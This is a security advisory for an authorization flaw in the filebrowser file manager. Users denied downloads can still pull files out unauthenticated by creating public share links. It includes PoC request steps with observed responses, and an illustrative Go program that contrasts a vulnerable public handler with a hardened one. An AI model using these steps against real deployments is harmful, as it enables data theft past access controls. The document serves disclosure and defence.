PT-2026-26089 · Go · github.com/filebrowser/filebrowser

Published 2026-03-18 · Updated 2026-03-18 · CVE-2026-32761

CVSS v3.1: 6.5 (Medium) AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

A permission enforcement flaw allows users without download privileges (download=false) who retain share privileges (share=true) to expose and retrieve file content through public share links. This bypasses the intended access control policy and enables exfiltration of data to unauthenticated users in deployments where download restrictions are used for data-loss prevention or role separation.

Details

The backend applies inconsistent authorization checks across the download paths:
  • Direct raw download correctly enforces Perm.Download: filebrowser/http/raw.go:82
  • Share creation only enforces Perm.Share: filebrowser/http/share.go:21
  • The public share and download handlers serve shared content without verifying that the share's owner has Perm.Download: filebrowser/http/public.go:18 and filebrowser/http/public.go:116
As a result, a user who is blocked from direct downloads can create a share and retrieve the same file, without any credentials, via /api/public/dl/<hash>. The share inherits none of the restrictions placed on its creator, so the public route becomes a second, unchecked download path.

PoC

  1. Create a non-admin user with:
     • perm.share = true
     • perm.download = false
  2. Log in as that user and upload a PDF file:
     • POST /api/resources/nodl secret <rand>.pdf with Content-Type: application/pdf (spaces in the filename must be percent-encoded in the request URL)
  3. Verify that direct raw download is denied:
     • GET /api/raw/nodl secret <rand>.pdf
     • Expected and observed: 202 Accepted (blocked; this is the status the raw handler returns when Perm.Download is false, not a 403)
  4. Create a share for the same file:
     • POST /api/share/nodl secret <rand>.pdf
     • Observed: 200, response includes the share hash (example: qxfK3JMG)
  5. Download publicly without authentication:
     • GET /api/public/dl/<hash>
     • Observed (vulnerable): 200, Content-Type: application/pdf, and the PDF bytes are returned
Live evidence captured (March 1, 2026):
  • create user: 201
  • create file: 200
  • direct /api/raw: 202 Accepted
  • create share: 200
  • public download /api/public/dl/mxK-ppZb: 200
  • public download content-type: application/pdf
  • public download body length: 327 bytes
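The following Go program is an added example that models the three checks listed under Details and walks PoC steps 3 to 5 in-process; it is not filebrowser's code. It assumes a simplified X-Auth token header, an in-memory file and share table, a constructed share hash and a constructed PDF body, and it goes beyond the page by running the same steps twice: once against the vulnerable public handler, which only resolves the hash, and once against a hardened variant that also requires the share owner's Perm.Download at serve time.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Perm holds the two flags the advisory is about; a Share records its owner's.
type Perm struct{ Download, Share bool }
type Share struct{ Path string; Owner *Perm }

// Server is a constructed stand-in for the three endpoints; Hardened enables the owner check.
type Server struct {
	files    map[string][]byte
	shares   map[string]*Share
	users    map[string]*Perm
	Hardened bool
}

func (s *Server) serve(w http.ResponseWriter, path string) {
	w.Header().Set("Content-Type", "application/pdf")
	w.Write(s.files[path]) // only seeded paths are ever served in this model
}

// raw models /api/raw/<path>. filebrowser answers 202 Accepted rather than
// 403 when the caller lacks Perm.Download, which is why the PoC expects 202.
func (s *Server) raw(w http.ResponseWriter, r *http.Request) {
	u := s.users[r.Header.Get("X-Auth")]
	switch {
	case u == nil:
		w.WriteHeader(http.StatusUnauthorized)
	case !u.Download:
		w.WriteHeader(http.StatusAccepted)
	default:
		s.serve(w, strings.TrimPrefix(r.URL.Path, "/api/raw/"))
	}
}

// share models /api/share/<path>: only Perm.Share is consulted.
func (s *Server) share(w http.ResponseWriter, r *http.Request) {
	u := s.users[r.Header.Get("X-Auth")]
	switch {
	case u == nil || !u.Share:
		w.WriteHeader(http.StatusForbidden)
	default:
		hash := fmt.Sprintf("h%d", len(s.shares)+1) // constructed; not filebrowser's hash format
		s.shares[hash] = &Share{Path: strings.TrimPrefix(r.URL.Path, "/api/share/"), Owner: u}
		fmt.Fprint(w, hash)
	}
}

// publicDl models /api/public/dl/<hash>, served without credentials. The vulnerable form
// only resolves the hash; the hardened form also refuses a share whose owner cannot download.
func (s *Server) publicDl(w http.ResponseWriter, r *http.Request) {
	sh, ok := s.shares[strings.TrimPrefix(r.URL.Path, "/api/public/dl/")]
	switch {
	case !ok:
		w.WriteHeader(http.StatusNotFound)
	case s.Hardened && !sh.Owner.Download:
		w.WriteHeader(http.StatusForbidden)
	default:
		s.serve(w, sh.Path)
	}
}

// call drives the router in-process; an empty token is an unauthenticated request.
func call(h http.Handler, method, path, token string) (int, string) {
	req := httptest.NewRequest(method, path, nil)
	req.Header.Set("X-Auth", token)
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code, rec.Body.String()
}

// runPoC walks PoC steps 3 to 5 with or without the owner check and returns the raw, share
// and public status codes plus the public body. User and PDF are seeded constructed data.
func runPoC(hardened bool) (raw, share, public int, body string) {
	s := &Server{files: map[string][]byte{}, shares: map[string]*Share{},
		users: map[string]*Perm{"tok": {Download: false, Share: true}}, Hardened: hardened}
	s.files["nodl secret.pdf"] = []byte("%PDF-1.4 constructed sample")
	mux := http.NewServeMux()
	mux.HandleFunc("/api/raw/", s.raw)
	mux.HandleFunc("/api/share/", s.share)
	mux.HandleFunc("/api/public/dl/", s.publicDl)
	name := url.PathEscape("nodl secret.pdf") // the space must be escaped in the URL
	raw, _ = call(mux, "GET", "/api/raw/"+name, "tok")
	share, hash := call(mux, "POST", "/api/share/"+name, "tok")
	public, body = call(mux, "GET", "/api/public/dl/"+hash, "")
	return
}

func main() {
	fmt.Println(runPoC(false)) // 202 200 200 %PDF-1.4 constructed sample
	fmt.Println(runPoC(true))  // 202 200 403
}
```

The hardened variant re-checks the owner's permission when the public route is hit rather than only when the share is created: a check at creation time alone would not cover a user whose download permission is revoked after the share already exists, whereas a serve-time check closes both cases.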

Impact

This is an access control / authorization policy bypass vulnerability.
  • Who can exploit: Any authenticated user granted share=true but denied download.
  • Who is impacted: Operators and organizations relying on download restrictions to prevent data export.
  • What can happen: Restricted users can still distribute and retrieve files publicly, including unauthenticated access through share URLs.

Fix

Weakness Enumeration

Incorrect Authorization
Improper Access Control
IDOR

Related Identifiers

CVE-2026-32761
GHSA-68J5-4M99-W9W9

Affected Products

github.com/filebrowser/filebrowser